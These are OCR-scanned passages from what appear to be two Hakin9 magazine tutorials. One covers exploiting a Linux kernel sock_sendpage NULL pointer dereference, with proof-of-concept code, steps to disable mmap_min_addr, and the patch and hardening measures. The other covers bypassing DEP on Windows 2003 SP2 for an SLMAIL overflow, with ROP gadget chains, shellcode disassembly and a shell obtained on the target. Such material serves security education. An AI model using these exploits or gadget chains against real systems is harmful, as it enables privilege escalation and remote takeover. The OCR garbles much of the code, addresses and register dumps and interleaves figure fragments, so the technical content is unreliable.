There are multiple situations that 
result with throwing a Segmentation Fault 
error for example: 

buffer overflows 

failing to validate data sufficiently 
before using them 
using uninitialized pointers 
dereferencing NULL pointers 

What's common to the mentioned 
errors is that all of them are directly 
caused by accessing unmapped 
memory or access memory 
inappropriately. 

Figure 3 shows a simplified version 
of the mechanism which stands behind 
triggering segmentation faults in the x86 
architecture. When the operating system 
detects that a user mode process is 
trying to access unmapped memory 
or memory it doesn't have Read, Write 
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Figure 1. Virtual memory mapping 
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Figure 2 Memory maps of a process 
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Figure 3. Causes of the segmentation violation signal 
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Listing 1. A socket in the Linux kernel 

128struct socket I 



129 socket_state state; 

130 short type; 

131 unsigned long flags; 

132 /* 

133 * Please keep fasync_list & wait fields in the same cache line 

134 */ 

135 struct f async_struct *f async_list; 

136 wa i t_queue_he a d_t wa i t ; 
137 

138 struct file *file; 

139 struct sock *sk; 

140 const struct proto_ops *ops; 



141}; 

Listing 2. A dummy sock_sendmsg implementation 

idefine EOPNOTSUPP 95 /* Operation not supported on transport endpoint */ 

int sock_no_sendmsg (struct kiocb *iocb, struct socket *sock, struct msghdr *m, size_t len) 

{ 

return -EOPNOTSUPP; 

} 



Listing 3. A BNEP protocol socket with o missing pointer to function sock_sendpoge 



static const struct proto 
. family = 
.owner = 
.release 
. ioctl 

Ufdef CONFIG_COMPAT 

. compat_ioctl = 



#endif 



.bind 
.getname 
. sendmsg 
. recvmsg 
.poll 
. listen 
. shutdown 
. setsockopt 
.getsockopt 
. connect 
. socketpair 
. accept 
.mmap 



ops bnep_sock_ops = | 

PF_BLUETOOTH, 
THIS_MODULE, 

bnep_sock_release, 
bnep_sock_ioctl, 

bnep_sock_compat_ioctl, 



sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock_ 
sock 



no_bind, 

no_getname, 

no_sendmsg, 

no_recvmsg, 

no_poll , 

no_listen, 

no_shutdown, 

no_setsockopt, 

no_getsockopt, 

no_connect, 

no_socketpair, 

no_accept, 

no_mmap 



Listing 4. Calling sendfiie to execute sockets sendpage function 

II Create socket 

int sk - socket (PF_BLUETOOTH, SOCK_DGRAM, BTPROTO_L2CAP) ; 
if (sk < 0) ( 

perror ("socket") ; exit (1) ; 

} 

// Setup source descriptor 
int in; 

if ((in - open ("/etc/passwd", 0_RDONLY) ) < 0) { 
perror ("open" ) ; exit (1) ; 

} 



// Copy 1 byte from file to socket 
sendfiie (sk, in, 0, 1) ; 
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Listing 5. A kernel bug trace in syslog 



[10106 
[10106 
[10106 

;ioio6. 

"10106 
"10106 
[10106 
[10106 
[10106 
"10106 
"10106 
"10106 
[10106 
[10106 
[10106 
"10106 
"10106 
"10106 
[10106 
[10106 
[10106 
[10106 
"10106 
"10106 
[10106 
[10106 
[10106 
[10106 
"10106 
."10106 
[10106 
[10106 
[10106 
"10106 
"10106 
[10106 



451972] 
451972; 
451972; 
451972" 
451972; 
451972; 
451972; 
451972; 
451972; 
451972; 
451972" 
451972; 
451972; 
451972; 
451972; 
451972" 
451972" 
451972" 
451972; 
451972; 
451972" 
451972; 
451972" 
451972; 
451972; 
451972; 
451972; 
451972" 
451972; 
451972" 
451972; 
451972; 
451972; 
451972; 
451972" 
451972] 



BUG: unable to handle kernel NULL pointer dereference at 00000000 
IP: [<00000000>" 

*pdpt = 000000002dl9d001 *pde = 0000000000000000 
Oops: 0010 [f 2) SMP 

Modules linked in: /a long list of modules */ 

Pid: 25449, comm: lt-12ping Tainted: G D (2.6.26-2-686 #1 036test001) 

EIP: 0060 : ;<00000000>; EFLAGS : 00210246 CPU: 0 
EIP is at 0x0 

EAX: eccc9040 EBX: f8ffa8a0 ECX: 00000000 EDX: c2elda48 
ESI: eccc9040 EDI: f54ac238 EBP: f389e240 ESP : edle9e44 

DS: 007b ES: 007b FS : 00d8 GS : 0033 SS: 0068 
Process lt-12ping (pid: 25449, veid: 0, ti=edle8000 task=f 3288050 task.ti=edle8000) 
Stack: c02557ca 00000001 00000000 c02e2540 edle9ea4 c019e4fb 00000001 edle9e68 
00000000 00000000 00000000 f54ac238 f54ac200 edle9ea4 00000000 c019ealf 
c019e4ac 00000000 c02d5d00 f54ac200 eccc90e0 edle9ebc f54ac200 c019eddf 
Call Trace: 

;<c02557ca>! sock_sendpage+0x31/0x36 

pipe_to_sendpage+0x4f /0x59 

splicef rom_pipe+0x4 8 / 0x1 8c 

[<c019e4ac> | pipe_to_sendpage+0x0/0x59 
;<c019eddf>" splice_from_pipe+0x81/0xa2 
[<c019eel2>l genericsplicesendpage+0xl2/0xl6 
pipe_to_sendpage+0x0/0x59 
do_splice_f rom+0x4f / 0x5d 
direct_splice_actor+0xl4/0xl8 
;<c019e7af> splice_direct_to_actor+0xc9/0xl6e 
[<c019e5ba>] direct_splice_actor+0x0/0xl8 
do_splice_direct+0x4a/ 0x67 
do_sendfile+0xl8d/0x24c 
sys_sendfile+0x71/0x7f 
do_page_fault+0x0/0x8c6 
syscall_call+0x7/0xb 



[<c019e4fb>] 
;<c019ealf>" 



[<c019e4ac>] 
"<c019e5ac>" 
[<c019e5ce> 



[<c019e89e>] 
"<c018459d>" 
<c018474f> 
;<c011aee6> 
;<c0108972>] 



Code: Bad EIP value. 

EIP: [<00000000>" 0x0 SS:ESP 0068 : edle9e44 
[ end trace 5325c019fd993004 ] 



Exploiting EIP=0x0 



Listing 6. The simplest exploit of the sock_sendpage vulnerability 

1 tinclude <sys/socket.h> 

2 tinclude <stdlib.h> 

3 tinclude <sys/mman.h> 

4 tinclude <fcntl.h> 



5 int kernelcode () 

6 { 

7 asm ( 

8 "movl $1 , %ebx; " 

9 "movl Sl,%eax;" 

10 "int 50x80;" ); /* exit(l); */ 

11 ) 



12 main() 

13 { 

14 int r; 

15 void * mptr = mmap (NULL, 0x1000, PROT_WRITE | PROT_READ | PROT_EXEC, MAP_ANONYMOUS I MAP_PRIVATE | MAP_FIXED, 0, 0); 

16 int fdin = open (" /etc /pass wd" , 0_RDONLY) ; 

17 * (char *) 0x0 = 0xe9; /* "jump near, displacement relative to next instruction" */ 

18 * (unsigned int *) 0x1 = ( &kernel_code) -5 ; 

19 ftruncate (fdin,getpagesize 0 ) ; 

20 int fdout = socket (PF_PPPOX, SOCK_DGRAM, 0); 

21 sendfile (fdout, fdin, 0, getpagesize 0 ) ; 

22 } 
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or eXecute access right to, it sends a 
S/GSEGV signal or calls a particular 
exception handler. 

Why is all that Interesting? 

Just to start, let's try to trigger a segfault 
using a simple program. 

This situation will cause a 
segmentation fault error and our process 
will get terminated. But what has really 
happened? 

main() { 

char* ptr = 0x0; 
*ptr = "AAAA"; 

} 

We initialized a pointer with NULL 
value and then tried to write to that 
memory. This particular memory region 
wasn't mapped so the CPU threw a 
page fault and our process received 
a segmentation fault signal. It had no 
SIGSEGV handler set up, so it was 
terminated. 

Great, now what? How to get from a 
segmentation fault caused by a NULL 
pointer dereference to kernel exploitation? 
Well, in some specific circumstances, it is 
possible. 

Many situations (like out of memory 
state or invoking maiioc (0)) result 
with a NULL value pointer, that is one 
pointing to the (void*) 0x0 address. It 
is uncommon to have the first page 
mapped, so access to such an address 
results in a page fault, which causes a 
SIGSEGV signal to be sent to the running 



process (causing a handler invocation 
or an exit with a core dump - see 
ulimit -c). However, there are situations, 
where one can access the first page 
of the address space normally - and 
unexpectedly influence the behavior of 
the process in case of a NULL pointer 
dereference. 

Let us map memory at the 0x0 
address. We use mmap o system call with 
a map _ fixed flag to ensure that the 
mapping is placed at the given address 
exactly and map _ anon not to map a 
specific file. 

mmap ( (void *) (page_size*0) , 0x1000, 
PROT_WRITE | PROT_READ | PROT_EXEC, 
map_anon I MAP_PRIVATE I MAP_FIXED, 
-1, 0); 

This operation may fail due to security 
measures implemented in the most recent 
Linux kernels: memory below vm.mmap _ 
min _ addr can't be mapped. There are 
ways to bypass this restriction but those 
are outside the scope of this article. To 
make our proof of concept exploit actually 
work, we have disabled it. This setting is 

Stored in /proc/sys/vm/mmap _ min _ 

addr - it's possible to write o to this file 

Orcallsysctl -w vm.mmap _ min _ 
addr=0. 

Real Kernel Bug Example 

There are known security vulnerabilities 
of the Linux kernel which depend on a 
NULL pointer dereference situation. One 
of these that we are describing below was 



discovered by Tavis Ormandy and Julien 
Tinnes (Google Security Team) in some 
Linux socket implementations. 

The general socket structure is defined 
in linux/net.h (Listing 1). 

Let's focus on the ops field. The 
proto_ops structure (defined lower in 
net.h) specifies an interface to act on 
the socket. It contains function pointers 
to operations which are implemented for 
the particular kind of socket. The protocol 
implementations are varied and some 
types of sockets don't provide all the 
functions like bind, connect etc. 

They can choose from a set of 
default routines for initializing struct 
proto _ ops with them, like the sock _ 
no _ sendmsg function which returns 
Operation not supported on transport 
endpoint error. So far so good (see 
Listing 2). 

If no function is assigned to some 
proto _ ops subfields (operations for a 
socket), the proto _ ops field contains 
NULL pointers to functions (Listing 3). In 
normal circumstances the OS detects 
access to an unmapped memory region 
and sends a segmentation fault signal, 
but what if we could somehow alter the 
memory under the NULL address, put our 
shellcode there or jump to a location of 
our choice? In that case there would be 
no segmentation fault and we would be 
able to trick the kernel into executing our 
code (see Listing 3). 

Function from ops.sendpage is 
invoked indirectly by sendfile system call. 
The instruction pointer is set to 0x0 (EIP=0) 
and the execution is continued. Let's try 
to make the kernel invoke sendpage on 
a Bluetooth socket without mapping the 
NULL memory first (Listing 4). 

Using sendfile causes invoking the 
proper sock_sendpage function. In this 
case, it results with a SIGSEGV signa 
and a stack trace in the syslog. We can 
see that the EIP was set to 0x0: (see 
Listing 5). 

Exploiting EIP=0x0 

When combined, modifying memory at 
0x0 and executing it by the kernel code 
allows taking over the most privileged 
mode: running in kernel space, or 
ringo. We need to put our shellcode 



Listing 7. A patch for the sock_sendpage vuinerabilities family 

static ssize_t sock_sendpage ( struct file *file, struct page *page, 
if (more) 

flags |= MSG_MORE; 

return sock->ops->sendpage ( sock, page, offset, size, flags) 
+ return kernel_sendpage ( sock, page, offset, size, flags); 



int kernel_sendpage (struct socket *sock, struct page *page, int offset, 
size_t size, int flags) 

{ 

if (sock->ops->sendpage) 

return sock->ops->sendpage ( sock, page, offset, size, flags) 
return sock_no_sendpage ( sock, page, offset, size, flags); 

> 
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On the 'Net 

http://lxr.linux.no/ 

http://www.informitcom/articles/article.aspx?p=370047 

http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html 

http://www.grsecuhty.net/ 

http://selinuxproject.org/ 

http://www.ibm.com/devetoperworks/linux/library/i-linux-kernet/ 
http://documents.iss.net/whitepapers/IBM_X-Force_WPJinai.pdf 
http://my.opera.com/taviso/blog/ 

http://www.grsecuhty.net/~spender/wunderbar_emporium.tgz 



under 0x0, but for convenience, let's 
just make it a jump to another function 
written in C (see Listing 6). Note that 
this time we use pf _ pppox protoco 
family instead of pf _ Bluetooth - just 
to show there are multiple vulnerable 
protocols. 

This proof of concept code shows 
how to perform the jump to our code 
(kernel _ code) by using sendfile 
(sock _ sendpage) NULL pointer 
dereference vulnerability 

First, to avoid the segmentation 
fault, we need to map the 0x0 address 
with mmap ( ) - see the line 1 5. Then 
we have to write to the 0x0 address 
the instruction 0xE9 (relative jump) 
followed by the address of our function 
to be executed. The relative jump 
instruction takes a 32-bit (4 byte) offset. 
We calculate the offset relative to the 
place where the instruction ends (0x5), 
so we need to subtract 5 from the 
absolute pointer to the function. Now by 
calling sendfile we will trigger the bug 
accessing page 0x0 and therefore jump 

to OUr function. Kernel _ code in this 

POC simply executes exit(i) but 
in a real exploit example it would 
probably spawn a UID 0 shell - see Brad 
Spengler's exploit. 

The presented sock _ sendpage 
vulnerability was patched, so the kernel 
checks for NULL value in the sock _ ops 
structure with already existing function 
kernel _ sendpage (see Listing 7). When 
NULL is encountered, the sock _ no _ 
sendpage tries to transmit the data with 
the sendmsg function. 

Protection 

This class of vulnerabilities resulting 
from kernel bugs has been addressed 



in the latest kernels. The main protection 
measure against the NULL pointer 
dereference exploits is the parameter 

/proc/sys/vm/mmap_min_addr 

The value of this parameter indicates 
the amount of the address space 
which is excluded from mapping by 
user processes. Setting this value to 
something like 64KB will provide defense 
measures against the potential future 
kernel bugs. 

Note that this value must be a multiply 
of page size: you can see the page size 
with getconf pagesize, or from the 
C code level With "getpagesize ( ) " 
function. However, some applications 
reguire ability to map page zero to work 
properly, WINE and DOSEMU are among 
them. 

The system hardening becomes 
another important countermeasure. 
There are several security patches 
which might be used to enhance 
security. SELinux for example has a 
special, policy specific permission for 
mapping the first page: mmap_zero, 
that allows the users to map the page 
zero. The administrators may consider 
disabling this permission e.g. for network 
daemons, thus making the NULL pointer 
dereference bugs much more difficult to 
exploit remotely. 

Grsecurity/PaX package also offers 
protection from dereferencing unwanted 
pointer. Combining KERNEXEC, which 
separates executable pages from non- 
executable ones in kernel virtual address 
space and UDEREF, which divides off 
user space and kernel space memory 
for data accesses makes exploiting 
significantly harder. 



Conclusion 

Although NULL pointers dereference 
bugs are a relatively new issue, security 
industry responded guickly and all 
the necessary patches were made 
available. Interestingly enough, exploits 
released by Brad Spengler managed 
to evade several security measures, 
including SELinux, AppArmor or LSM and 
work on both x86 and x64 platforms. 
On top of that, he actually utilizes one 
feature specific to SELinux to perform 
mapping at page 0x0. This is a case 
when one security measure, SELinux, 
is used to bypass another security 

measure - mmap _ min _ addr. This 

incident proved that this kind of bugs 
should be considered serious and 
avoided. It is equally important to turn 
all the NULL pointer dereference issues 
unexploitable with appropriate tools. 
Concluding our walk through, we started 
with a short virtual memory description, 
continued with a basic NULL pointer 
dereference example and segmentation 
faults to finally explain how those 
bugs work on a real kernel example. 
This article is just an introduction to 
the subject and we encourage further 
individual research. We hope that from 
now all the NULL pointers issues will 
attract your attention, whether you are 
a developer, administrator or a security 
researcher. 
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Difficulty 



Bypassing Hardware 
Based Data Execution 
Prevention (DEP) on 
Windows 2003 Service 
Pack 2 



A short history on Data Execution Protection (DEP): it was created 
in order to prevent execution in memory in areas that aren't 
executable. Before trying this, I highly suggest reading Skape 
and Skywing's Article in Uninformed called Bypassing Windows 
Hardware-Enforced DEP. 



T 



his is a great article and is invaluable. 
Skape and Skywing are amazing minds 
and are definitely superhumans in ASM. 



Background 

Let's start off with the basics on a stack-based 
overflow. These types of overflows are almost 
non-existent in the real world today and are 
about as easy as it gets. When a developer 
wrote a specific application, they allocated a 
certain amount of characters for a specific field 
and did not do proper bounds checking on a 
given field. 

The example we will be using is an easy 
stack-based vanilla overflow in an application 
called SLMAIL. Mati Aharoni from Offensive 
Security discovered the SLMAIL vulnerability back 



in 2004. This exploit takes advantage of improper 
bounds check within the PASS field within the 
SLMAIL POP3 server (port 110). 

Let's dissect the actual exploit itself navigate 
to: http://www.milw0rm.com/exploits/638. 

If you look at where the actual attack occurs, 
it occurs at the PASS field PLUS the buffer The 
buffer consists of 4,654 As (\x4i triggers our 
overflow), an address to our shellcode, some 
nops and our shellcode. To back up a bit, the way 
this overflow works is by overwriting a specific 
memory address called EIR EIP is an instruction 
pointer that tells the system where to go after it's 
finished. 

If we can control EIR we can tell the system 
to go back to where our shellcode is, typically 
these addresses are (for example) CALL ESP or 




Figure 1. Running the exploit from *nix box 
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JMP ESP. ESP is the starter point for the 
specific stack that we are in (i.e. where 
ourshellcode is). Looking at the exploit, 
we can see that 4654 A's are sent, the 
next 0x78396ddf is a memory address 
that ends up overwriting EIP and jumps 
us right back to our shellcode. 

NOPS are represented by \x90 in 
ASM and are symbolic of No Operation 
(noop). This means do nothing, and 
continue moving down the code until 
you hit a valid instruction. The technigue 
of noops is used when you aren't 100 
percent certain where you're going to 
land and you do a slide until you hit your 
shellcode. This also helps to remove 
any garbage characters that may be left 
over from the legitimate function. Once 
the noops are finished, the shellcode is 
then executed which has our malicious 
code, i.e. a reverse shell, bind shell, 
useradd, etc. 

So the entire point of this stack 
overflow is: Overwrite EIP, jump back to 
ourshellcode (JMP ESP), and execute 
our shellcode. If you look at the date 
and what the specific exploit was tested 
on, we see that the exploit was tested 
on Windows 2000, Service Pack 4. 
What would happen if you ran this exact 
exploit on Windows XP SP2, Windows 
2003 SP1, Windows 2003 SP2, and so 
on? 

We'll only talk about Windows 
2003 SP2 in this specific paper since 
each OS, while of course different, is 
relatively similar. It is significantly easier 
to bypass DEP in Windows XP SP2 
and Windows 2003 SP1 than it is with 
Windows 2003 SP2 due to two checks 
being made in memory instead of one 
(CMP AL and EBP vs. EBP and ESI). 

Let's run this in a debugger. In this 
instance I'll be using Immunity Debugger 
First we download the exploit from 
MilwOrm and ran it through your favorite 
debugger. Lets run the exploit from our 
*nix box (see Figure 1). 

In our debugger, we get an access 
violation on the first instruction on our 
controlled stack: (see Figure 2). 

Diving down further: By right clicking 
on My Computer, Properties, Advanced, 
under Performance Advanced, and 
Data Execution Prevention, we can see 



that Turn on DEP for all programs and 
services except those I select. This 
is problematic for us, as we want to 
exploit this system and gain access to 
it. 



Now that we know DEP is enabled, 
we need a way of disabling it so that 
our controllable stack is executable and 
ourshellcode can function correctly. 
Fortunately for us, there is a way to 



- . * - - " 

68 65 20 66 61 69 6C 65 64 e f ai led 
70 20 20 20 25 73 8B 00 00 - Sit... 



[08:18:51] Access violation when executrig [783D8DDF] ■ use Shift* F7/F8/F8 lo pass exception to program 
Figure 2. Access violation 





7C83F517 
7C83F51E 
7C83F520 
7C83F523 
7C83F524 
7C83FS26 
7C83FS28 


C745 FC 0290900 
6fi 04 
8D45 FC 
50 

tf-H 22 
6PI FF 

E8 1235FEFF 


HOU DWORD PTR SS:CEBP-4],2 
PUSH 4 

LER E OX, DWORD PTR SS:CEBP-4] 
PUSH EAX 
PUSH 22 
PUSH -1 

ntdll.ZuSet Inf ormat ion Process 



Figure 3. Storting the ZwSetlnformationProcess 




7CS34307| 



SS4E 37 SO OF. BYTE PTR 

5E POP ESI 

C9 LEfiUE 

C2 8480 RETr- 4 
64:fll 18080000 MOU EflX, QWOR 

3B40 30 MOU EflX, DWOR 

8B78 0C MOU EDI. DWOR 



CESI +37], 80 



TR FS1CI8] 

'TR DSs[EflX+30] 

'TR 0S:CEAX+C] 



Figure 4. ZwSetlnformationProcess 



Eh: : 09000000 

ECX 01F39EF4 RSCII "99/06/08 88:36:36 P3-8081: Illegal < 
EDX 000003CR 

EBX 00000004 

ESP 01F3O158 
EBP 41414141 

ESI 00000000 

EDI 00000001 

EIP 7C93C899 SHELL32. 7C93C899 



Figure 5. Registers 



■ 54 


PUSH ESP 


7C93C39R 5D 
7C93C89B C2 0468 


POP EBP 
4 

I** 



Figure 6. EBP 



Registers (FPU) 



ECX Q1F39EF4 RSCII "09/06/08 08:36:36 P3-0G 

EDX 000003CR 

EBX 00000004 

ESP 01F3R154 

EBP 41414141 

ESI 00wyyw00 

EDI 00000001 

EIP 7C93C890 SHELL32. 7C93C89A 



Figure 7. ESP 
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do this. In this specific exploit, I figured 
using a standard stack overflow would 
be super-simple to do, however, it proved 
a lot more difficult than I could have 
imagined. To start off and repeat a little 



of Skape and Skywing's information, in 
order to bypass DER you have to call a 
function called ZwSetlnformationProcess 

(in routine LdrpcCheckNXCompatibil 
ity). 



When this function is called, you 
must have certain things already 
setup in order for it to disable DEP and 
ultimately jump us back to our controlled 
stack. Let's take a look at the actua 
function first before we start diving down 
in it. We'll head off to NTDLL and look 
at address 0x7C83F517. This starts the 
ZwSetlnformationProcess and is our 
beginning point to disabling DEP (see 
Figure 3). 

Looking at the specific calls, the 
first thing it tries to do is MOV DWORT 
PTR SS:[EBP-4],2. It is specifically 
trying to WRITE something to a specific 
memory address. If our registers are 
not properly set up, this will fail and an 
exception will be thrown similar to the 
one we saw earlier. Next it pushes the 
value 4 to the stack, pushes EAX to the 
stack, pushes 22 to the stack, pushes 
-1 to the stack, and ultimately calls the 
ZwSetlnformationProcess function. 

Let's continue on after the call. It will do 
some magic, and ultimately come here: 
(see Figure 4). 

We now see that it does the same 
thing for ESI, so again ESI must now be 
a writeable memory address for it to not 
bomb out. We now know that we need the 
registers EBP and ESI to point to writeable 
memory addresses somehow in order 
for the rest of this to work. Let's first take 
the vanilla SLMail exploit that does not 
bypass DEP and work it into something 
that will fully bypass NX. One thing to 
be aware of here is the LEAVE call. This 
will more or less take the value of EBP 
and make it ESR This is problematic 
if we have EBP pointing to our HEAP. 
So we need to get it somewhere near 
our controllable stack if we want code 
execution. 

Let's take a look at our registers at the 
time of the overflow to see what we have 
to work with (see Figure 5). 

Looking at our registers, it looks 
ike ECX points to the HEAP which can 
be beneficial for us, as it is writeable. 
If we want to get crazy with it, we could 
possibly just do a heap spray. But let's 
be more creative. We see that the only 
really good register we can use is ESP 
and possibly ECX. ESP points pretty 
close to where our shellcode is, and ECX 



01F3Q154I 



01F3R1S3 
01F3Q15C 
01F3Q160 
01F3R164 
01F3R168 



01F3P153 Xi<0 
7C806B03 •k?! 
7C85E6F7 z\>h\ 
7C8043R3 dCQI 
7C934FS7 UlOo ! 
7CSF7495 otfi! 



ntdl 1.7CS06B03 
RETURN to ntdtl.7C 
ntdl L.7C8043A3 
RETURN to SHELL32. 
SHELL32.7C8F749S 



01F3R16C 7C83F517 $J a ! ntd U . 7C83F517 



Figure 8. ESP 



Registers (FPU) 



eh:: 0M00Q000 

ECX 01F39EF4 ASCII "09/06/08 
EDX 000003CP, 
EBX 000R0004 
ESP 01F3P.1S8 
EBP 01F3A158 

ESI 00000000 
EDI 00000001 

EIP 7C93C89B SHELL32. 7C93C89B 



Figure 9. Registers (FPU) 



09/06/08 08:36:36 P3-0i 



Reg l 


sters (FPU) 




< 


EDX 


MMMH03CO 






EBX 


7C3043R3 ntdl I 


. 7C8043P3 




ESP 


01F3A164 






EBP 


01F3H158 






ESI 


00000000 






EDI 


00000001 






EIP 


7C806B04 ntdll 


. 7C806B04 




C 0 


ES 0823 32b it 


0( FFFFFFFF) 




P 1 


CS 001B 32bit 


0( FFFFFFFF) 





Figure 10. Registers (FPU) 



Eh; : 00800009 

ECX 91F39EF4 PSCII "89/66/98 98:36:36 P3-9991: Illegal conmand 9(RRRflflf 
EDX 999903CH 

EBX 7C8943R3 ntdl 1 . 7C3043R3 
ESP 01F3R16C 
EBP 81F3R158 

ESI 91F39EF4 ASCII "09.-86 08 93:36:36 P 3-9991: Illegal conn-and CM MW*¥ 
EDI 7C934F5R SHELL32.7C934F5A 

EIP 7C8F7495 SHELL32.7C8F7495 



Figure 11. Registers (FPU) 



7C83F5171 


C745 FC 02060 


00i MOU DWORD PTR SS:CEBP-43,2 


7C83FS1E 


6h 04 


PUSH 4 


7C83FS20 


8D45 FC 


LEfi EfiX, DWORD PTR SS:CEBP-*1 


7C33FS23 


50 


PUSH EAX 


7C83FS24 


6PI 22 


PUSH 22 


7C33F526 


6fl FF 


PUSH -1 


7C83FS2S 


E8 1285FEFF 


ntdl I . Z uSet I n f or rtat i on Process 



Figure 12. Data execution prevention 



66 HAKIN9 2/2010 



BYPASSING HARDWARE BASED DATA EXECUTION PREVENTION 



somewhere in memory. Remember we 
need EBP and ESI to point to writeable 
memory addresses in order for us to 
disable NX. So let's tackle EBP first. We 
find a convenient PUSH ESP POP EBP 
RETN0x4 in SHELL32 at memory address 
0x7C93c899 (see Figure 6). 

Once this executes, it will push the 
value of ESP onto our stack (see Figure 7). 

Our ESP is 01 F3A1 54, let's check what 
got pushed onto our stack (see Figure 8). 

The stack shows 01F3A154, great! Now 
we need to POP the value in the stack to 
EBP (see Figure 9). 

Now we have EBP pointing to 
our original ESP address which is 
somewhere near our shellcode. Pretty 
easy so far... 

Next we need to get ESI pointing to 
somewhere that is executable. A simple 
technigue would have been a PUSH 
ESP, PUSH ESP, POP EBP, POP ESI, RETN 
or variations to that affect, but sifting 
through memory land, I wasn't able to 
find anything. At this point I I got a little 
creative. 

We need to get ESI to a writeable 
memory address; either ESP or ECX 
will work from an address perspective. 
Let's take a look at the next series of 
commands here. Be sure to pay close 
attention, it can get confusing fast: 

h address space 0x7C806B03 is a 
POP EBX, RETN. This will take a memory 
address ALREADY on the stack and pop 
it to the EBX register. We arbitrarily insert 
our own address where we want it to 
eventually go. Take a look at the code: 

# POP EBX, RETN 0x7C806B03 @NTDLL 
disablenx+='\x03\x6B\x80\x7C # 

0x7C8043A3 will be EBX when POP 

# This is needed for NX Bypass 

for ESI to be writeable. 

# POP EDI, POP ESI, RETN 0x7c8043A3 

@NTDLL 

disablenx+=' \xA3\x4 3\x80\x7c ' 

When I call the memory address 
0x7c806B03 in NTDLL, it will POP 
0x7c8043A3 as the value for EBX. So EBX 
now looks like this: see Figure 10. 

This still doesn't help us, as ESI is still 
a bogus address of 000000. Our next 
command issued is this: 



#PUSH ECX, CALL EBX 0x7c934f57 @SHELL32 
disablenx+= ' \x57\x4F\x93\x7C ' # 
This will go to EBX (0x7c8043A3) 

This command will PUSH ECX to the stack 
and CALL EBX. 

Remember, we arbitrarily set ECX to 
another portion in memory one step before. 
When the value ECX gets pushed, it then 
CALLS EBX, which is now a POP EDI, POP 
ESI, RETN. Why this is important is it will 
POP EDI from a value off of the stack. We 
don't care about EDI, but need to remove 1 



address from of the stack in order for the 
correct value to be popped into ESI. The 
second POP ESI will pop the value of EBX 
into the ESI register. Once this occurs we 
now have EBP and ESI pointing to writeable 
memory addresses (see Figure 11). 

Look at EB: its our original ESP 
(start point). Look at ESI, it points to the 
memory address of ECX. Next we call our 
ZwSetlnformationProcess to disable Data 
Execution Prevention. This is located at 
memory address 0x7C83F5i7 (see 
Figure 12). 



Registers (FPU) 



EflX C000000D 
ECX 00000801 

EDX FFFFFFFF 

EBX 7C8043A3 ntd I L . 7C8043A3 
ESP 01F3R164 

EBP 7C83F52D ntd t 1 . 7C83F520 
ESI 90909890 

EDI 7C934F5R SHELL32, 7C934F5B 
EIP FFFFFFFF 



< 



Figure 13. ESI 



Registers (FPU) 



EflX C00Q000D 
ECX 00000001 

EDX FFFFFFFF 

EBX 7C8043R3 ntd II . 7C804393 
ESP 01F3A164 

EBP 7C83F52D ntd I 1 . 7C83FS20 
ESI 90909890 

EDI 7C934F5A SHELL32. 7C934F5A 
EIP FFFFFFFF 



Figure 14. Registers (FPU) 



01F3R15C 


FFFFFFFF 






01F3R160 


00000022 


P'P 

■ ■ ■ 




01F3R164I 


01F3R154 


Ti<0 




01F3R168 


00000604 


■ ■ ■ 




01F3R16C 


90909090 


EE EE 




01F3R170 


90909090 


EEEE 




01F3R174 


90909090 


EEEE 




01F3R178 


90909090 


EEEE 




01F3R17C 


90909090 


EEEE 




01F3R130 


909Q9090 


EEEE 




01F3R184 


90909090 


EEEE 





Figure 15. Let's look at the stack 
7C35E 



83C4 20 
7C85E6FA 5E 
7C8SE6FB 5D 
7C8SE6FC C2 8409 



Figure 16. Memory address 



ADD ESP, 26 
POP ESI 
POP EBP 





7C86A81BI 


FFE4 


ESP 








7C86fi01O 
7C86O01E 
7C86P022 


"867CF0 9F 
867C90 90 


LOHF 

XCHG BVTE 
XCHG BVTE 


PTR 
PTR 


DS: 
DS: 


CEDX+EDI* 
CERX+EDX* 



Figure 17. Memory address 
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Here we go through the check to see if 
EBP is writeable. It is, it continues on to get 
the parameters set up properly for the CALL 



to ZwSetlnformationProcess Once we go 
through that, it does some magic, and then 
we are to the check on ESI (see Figure 13). 





&1F3A194 


90 






NOP 


01F3A195 


90 






NOP 
NOP 


01F3A196 


90 






01F3A197 


90 






NOP 


01F3A198 


90 






NOP 


01F3A199 


90 






NOP 


01F3A19A 


99 






NOP 


01F3A19B 


90 






NOP 


01F3A19C 


90 






NOP 


01F3A19D 


90 






NOP 


01F3A19E 


90 






NOP 


01F3A19F 


90 






NOP 


01F3A1A0 


90 






NOP 


01F3A1A! 


90 






NOP 


01F3A1A2 


90 






NOP 


01F3A1A3 


90 






NOP 


01F3A1A4 


98 






NOP 


01F3A1A5 


90 






NOP 


01F3A1A6 


90 






NOP 


01F3A1A7 


90 






NOP 


01F3A1A8 


90 






NOP 


01F3A1A9 


90 






NOP 


01F3A1AA 


90 






NOP 


01F3A1AB 


90 






NOP 


01F3A1AC 


90 






NOP 


01F3A1AD 


90 






NOP 


01F3A1AE 


90 






NOP 


01F3A1AF 


90 






NOP 


01F3AIB0 


90 






NOP 


01F3A1B1 


90 






NOP 


01F3A1B2 


90 






NOP 


01F3A1B3 


90 






NOP 


01F3A1B4 


90 






NOP 


01F3A1B5 


90 






NOP 


01F3A1B6 


90 






NOP 


01F3A1B7 


90 






NOP 


01F3A1B8 


90 






NOP 


01F3A1B9 


90 






NOP 


01F3A1BA 


90 






NOP 


01F3A1BB 


90 






NOP 


01F3A1BC 


90 






NOP 


01F3A1BD 


90 






NOP 


01F3A1B6 


90 






NOP 


01F3A1BF 


90 






NOP 


01F3A1C0 


90 






NOP 


01F3A1C1 


90 






NOP 


H1F3A1C2 


2BC 9 






sue ECX.ECX 


01F3A1C4 


83E9 


CO 




SUB ECX,-36 


01F3A1C7 


D9EE 






FLDZ 


01F3A1C9 


097424 F4 


FSTENU (28-BVTE) PTR S'f;[ESP-C] 


01F3A1CD 


SB 






POP EB>' 


01F3A1CE 


8173 


13 


D0F3B1A: XOR DWORD PTR OS: CEBX+13J" . P3B1F3D0 


01F3A1D5 


83EB 


FC 




SUB EBX, -4 


01F3A1D8 


A E2 FA 






SHORT 01F3A1CE 



Figure 18. Shellcode 



as 
I 



as 



efii32\cnid.exe 



: \Dg tu merit s and Settings\Administrator>net user 
ser Accounts for WSEHhCKTHISBOX-0 



A dn in is t rat op ASPNET Guest 

iUSR_SSHHCKIHISBOX-0 ] UATLSSHACKTHI EBOX-0 SUPPORT _388945a0 

The command completed successfully. 



C:\Documcnts and Settings\Administrator>_ 



I- 



Figure 19. Modified shellcode 



It checks ESI, it's writeable, POPs 
ESI, moves the value of EBP to ESP 
and RETNs. We should be good to go 
